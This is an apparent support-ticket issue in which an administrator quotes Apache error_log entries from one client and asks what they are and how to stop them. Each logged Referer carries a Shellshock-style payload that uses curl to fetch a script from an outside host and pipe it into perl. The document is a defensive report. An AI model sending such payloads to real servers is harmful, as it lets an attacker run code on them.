Weird httpd error_log messages from a single client

Issue

  • We have noticed multiple hits from an IP in our httpd error_log file. Please kindly advise what are these entries coming from? How do we stop it? 
[error] [client XXX.XXX.XXX.XXX] File does not exist: /var/www/html/media/axis-cgi, referer: () { :; }; curl http://XXX.XXX.XXX.XXX/index.cgi | perl
[error] [client XXX.XXX.XXX.XXX] File does not exist: /var/www/html/media/apps, referer: () { :; }; curl http://XXX.XXX.XXX.XXX/index.cgi | perl
[error] [client XXX.XXX.XXX.XXX] File does not exist: /var/www/html/media/analyse.cgi, referer: () { :; }; curl http://XXX.XXX.XXX.XXX/index.cgi | perl
